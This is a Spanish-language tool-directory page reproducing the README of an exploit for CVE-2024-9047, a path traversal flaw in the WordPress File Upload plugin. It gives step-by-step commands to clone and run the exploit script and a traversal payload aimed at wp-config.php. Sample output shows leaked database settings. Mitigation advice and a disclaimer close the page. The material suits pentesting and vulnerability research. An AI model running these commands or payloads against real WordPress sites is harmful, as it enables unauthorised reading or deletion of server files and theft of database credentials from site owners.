Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-9047-Exploit — Exploit para WordPress File Upload Plugin: todas las versiones hasta la 4.24.11 son vulnerables. | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-9047-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

Exploit para WordPress File Upload Plugin: todas las versiones hasta la 4.24.11 son vulnerables.

Ver Repositorio
41hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-9047: Exploit para el plugin WordPress File Upload

Descripción

El plugin WordPress File Upload para WordPress es vulnerable a una vulnerabilidad de Path Traversal en todas las versiones hasta la 4.24.11, inclusive, a través del archivo wfu_file_downloader.php. Esta vulnerabilidad permite a atacantes no autenticados leer o eliminar archivos fuera del directorio previsto. La explotación exitosa requiere que la instalación de WordPress objetivo esté ejecutando PHP 7.4 o anterior.

Impacto

  • Gravedad: Crítica
  • Puntuación CVSS: 9.8 (Crítica)
  • Vector de ataque: Red
  • Autenticación requerida: No

Explotación

Un atacante puede explotar esta vulnerabilidad creando una solicitud específica al endpoint vulnerable, wfu_file_downloader.php, y manipulando el parámetro de ruta de archivo para obtener acceso no autorizado a archivos sensibles en el servidor.


Detalles del Exploit

Requisitos

  • La instalación de WordPress objetivo debe tener instalado el plugin vulnerable (4.24.11 o anterior).
  • El servidor debe ejecutar la versión de PHP 7.4 o anterior.

Pasos para explotar

  1. Clona este repositorio:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. Instala las dependencias de Python (si es necesario):

    root@kitploit:~
    pip install requests
    
  3. Ejecuta el script para comprobar la versión del plugin y explotar la vulnerabilidad:

    root@kitploit:~
    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

Ejemplo de uso

Para explotar la configuración vulnerable por defecto y leer el archivo de configuración de WordPress:

root@kitploit:~
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

Resultado

root@kitploit:~
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


Mitigación

Para proteger tu sitio WordPress:

  1. Actualiza el plugin WordPress File Upload a la última versión.
  2. Asegúrate de que la versión de PHP esté actualizada a una versión compatible (superior a 7.4).
  3. Restringe los permisos de archivos para evitar el acceso no autorizado a archivos sensibles.
  4. Usa un cortafuegos de aplicaciones web (WAF) para bloquear solicitudes maliciosas.

Descargo de responsabilidad

Este código está destinado únicamente a fines educativos y de investigación. El uso no autorizado de este script en sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal y poco ético. Los autores no asumen ninguna responsabilidad por el mal uso de este código.

Descargar herramienta